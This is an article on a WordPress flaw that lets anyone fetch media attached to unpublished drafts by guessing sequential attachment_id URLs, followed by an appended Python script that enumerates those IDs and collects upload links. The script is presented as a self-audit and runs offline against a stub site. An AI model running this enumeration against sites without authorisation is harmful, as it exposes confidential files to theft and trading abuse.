A minor flaw in WordPress has much wider implications - it potentially exposes an organisation to data leakage. If a company uploads media to support a draft blog post, the text of the draft may be protected, but the supporting material is open to discovery by anyone who guesses its URL. While many may deem the risk low, it potentially exposes a listed company to insider trading, or a design company to copyright theft.
WhiteHat Security’s Technical Evangelist Robert Hansen has outlined how this flaw works and what the implications are. Please see the full text below.
Information Leakage in WordPress
WordPress suffers from a fairly minor flaw that may be used by attackers without much difficulty. WordPress flaws have been numerous over the years - everything from command injection or SQL injection to XSS (cross-site scripting) and CSRF (cross site request forgery). One of my favourite issues has always been information leakage because it's the one that's always marked as low severity and that no one ever takes seriously. That said, it's still an exploit that could be disastrous in some circumstances.
WordPress has an upload process for media that is separate from the blog posting process. As such, they aren't governed by the same rules concerning authorisation. Once something is uploaded as media it is instantly visible on the site, regardless of whether the blog post has been posted yet or not.
Additionally, the URLs used by the blog are extremely easy to brute force because they are always larger than the last attachment_id by some amount. The actual number is based on how many posts are in the database and not just on media, so it does take a tiny bit of work to know when to stop looking. But the URLs are consistently like this:
/?attachment_id=4
/?attachment_id=130
/?attachment_id=131
/?attachment_id=249
Now you're asking yourself, so what? The problem is that because the timing between the media and the blog post isn't identical you can end up in a race condition with the content. For instance, let's say you run a publicly traded company and you are about to release your earnings report on your blog. You may upload a PDF of the earnings report a day or multiple days in advance to make sure everything is perfect and ready to go when you announce. In this case the adversary can guess the URL for the PDF of your earnings report and download it potentially days in advance. This would allow them to trade in advance of your company's earnings report.
Another example is where a blog post is internally contentious and needs a lot of editing. It may take months for a big company to decide that a post is ready to go. But in that timeframe an attacker may identify the cited uploaded media - images, movies, PDF documents, Word documents, Excel spreadsheets, HTML and so on. This can give an adversary a great deal of information before you're ready to disclose it. This can be used for anti-competitive practices, or simply to predict the features of the next gadget your company is producing.
A minor issue, but definitely one to be aware of if you’re using WordPress.
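The enumeration Hansen describes, written out as an added example (this is not code from the original article, from WhiteHat Security or from WordPress). It probes /?attachment_id=N upward and applies the stopping rule the text alludes to: attachment IDs are interleaved with post, page and revision IDs, so the scan ends only after a long run of consecutive misses. The site name example.com, the attachment IDs 4, 130, 131 and 249 and the page bodies are constructed so the script runs offline; the stub fetcher stands in for HTTP and mimics WordPress's default behaviour (404 for IDs that are not attachments, 200 for attachment pages), which is an assumption about the target rather than something the article states. The http_fetcher function is included for use against a site you are authorised to test and is not exercised here.

```python
"""
Attachment-ID enumeration against a WordPress site.

Added example, not part of the original article or of WordPress itself.
Everything under SITE/BASE is constructed test data so this runs offline;
swap make_stub_fetcher(...) for http_fetcher to probe a real, authorised target.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class Response:
    status: int
    url: str             # final URL after redirects (attachment pages often 301 to a pretty URL)
    body: str = ""


@dataclass
class Hit:
    attachment_id: int
    page_url: str
    media_urls: List[str] = field(default_factory=list)


Fetcher = Callable[[str], Response]

# Uploaded files live under wp-content/uploads whatever the attachment page's own URL is.
UPLOAD_RE = re.compile(r"https?://[^\s\"'<>]+/wp-content/uploads/[^\s\"'<>]+")


def media_urls_in(body: str) -> List[str]:
    """Distinct wp-content/uploads links in a page body, in document order."""
    seen: Dict[str, None] = {}
    for m in UPLOAD_RE.findall(body):
        seen.setdefault(m, None)
    return list(seen)


def enumerate_attachments(base_url: str, fetch: Fetcher, start: int = 1,
                          max_gap: int = 200, limit: int = 100_000) -> List[Hit]:
    """Probe /?attachment_id=N upward from `start` and collect attachment pages.

    Attachment IDs share the wp_posts ID sequence with posts, pages and revisions,
    so long gaps between attachments are normal. The scan therefore stops only after
    `max_gap` consecutive misses (or at `limit`); too small a gap ends it early.
    """
    hits: List[Hit] = []
    misses = 0
    n = start
    while n <= limit and misses < max_gap:
        resp = fetch(f"{base_url}/?attachment_id={n}")
        media = media_urls_in(resp.body)
        # Default WordPress: 404 for non-attachment IDs, 200 (after redirects) for an
        # attachment page. Some themes serve their 404 template with HTTP 200, so also
        # require a sign of an attachment page: the `attachmentid-N` body class that
        # body_class() emits, or at least one uploaded-file link in the body.
        if resp.status == 200 and (f"attachmentid-{n}" in resp.body or media):
            hits.append(Hit(n, resp.url, media))
            misses = 0
        else:
            misses += 1
        n += 1
    return hits


def http_fetcher(url: str, timeout: float = 10.0) -> Response:
    """Real fetcher: follows redirects as a browser would; 4xx/5xx become Response(status)."""
    req = urllib.request.Request(url, headers={"User-Agent": "attachment-audit/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return Response(r.status, r.geturl(), r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return Response(e.code, url, "")


def make_stub_fetcher(site: Dict[int, str], base_url: str) -> Fetcher:
    """Constructed stand-in for HTTP. `site` maps existing attachment IDs to the
    uploaded file name; every other ID gets a 404, as stock WordPress returns."""
    def fetch(url: str) -> Response:
        qs = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
        n = int(qs.get("attachment_id", ["0"])[0])
        if n not in site:
            return Response(404, url, '<html><body class="error404">Not found</body></html>')
        fname = site[n]
        body = (f'<html><body class="attachment attachmentid-{n}">'
                f'<a href="{base_url}/wp-content/uploads/2014/02/{fname}">{fname}</a>'
                f'</body></html>')
        return Response(200, f"{base_url}/draft-post/{fname.rsplit('.', 1)[0]}/", body)
    return fetch


# Constructed site: the unpublished earnings PDF sits at ID 130, far past the last
# visible attachment (ID 4) because posts and revisions consumed the IDs in between.
BASE = "https://example.com"
SITE = {4: "logo.png", 130: "q4-earnings-draft.pdf",
        131: "q4-earnings-chart.png", 249: "roadmap.xlsx"}


def demo(max_gap: int) -> List[int]:
    """IDs found on the constructed site with a given stopping threshold."""
    hits = enumerate_attachments(BASE, make_stub_fetcher(SITE, BASE), max_gap=max_gap)
    return [h.attachment_id for h in hits]


if __name__ == "__main__":
    for gap in (50, 200):
        hits = enumerate_attachments(BASE, make_stub_fetcher(SITE, BASE), max_gap=gap)
        print(f"max_gap={gap}: found IDs {[h.attachment_id for h in hits]}")
        for h in hits:
            print("   ", h.attachment_id, h.page_url, h.media_urls)
```

Run as-is and the two passes show the stopping rule at work: with max_gap=50 the scan gives up in the 125-ID gap after the logo and reports only ID 4, while max_gap=200 reaches the draft earnings PDF, its chart and the spreadsheet. Against a live site the same loop is a quick self-audit: any media it turns up that belongs to an unpublished post is exactly the exposure the article describes.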